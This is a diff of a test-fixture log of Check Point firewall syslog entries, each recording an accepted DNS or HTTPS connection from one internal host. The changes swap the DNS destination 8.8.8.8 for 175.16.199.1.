+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x18,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"26"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33254"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x19,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"27"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55117"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1a,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"28"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37870"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1b,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"29"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.175"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39088"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1c,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"30"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"185.33.223.80"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46420"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1d,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"31"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49331"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1d,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"31"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49331"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1e,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"32"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.17.38"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43484"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1f,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"33"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37762"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x20,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"34"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44414"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x20,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"34"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44414"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x21,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"35"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"188.40.137.18"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49820"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x22,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"36"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60192"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x23,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"37"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x22,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"36"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60192"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x23,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"37"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x24,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"38"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"188.40.137.18"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49822"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x25,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"39"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.17.35"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51528"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x26,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"40"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"188.40.137.18"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49826"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x27,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"41"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57410"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x28,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"42"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37940"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x29,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"43"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59816"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x28,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"42"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37940"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x29,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"43"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59816"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2a,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"44"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.17.102"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50004"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2b,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"45"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.20.65"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37704"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2c,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"46"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52820"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2d,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"47"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44623"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2c,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"46"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52820"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2d,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"47"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44623"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
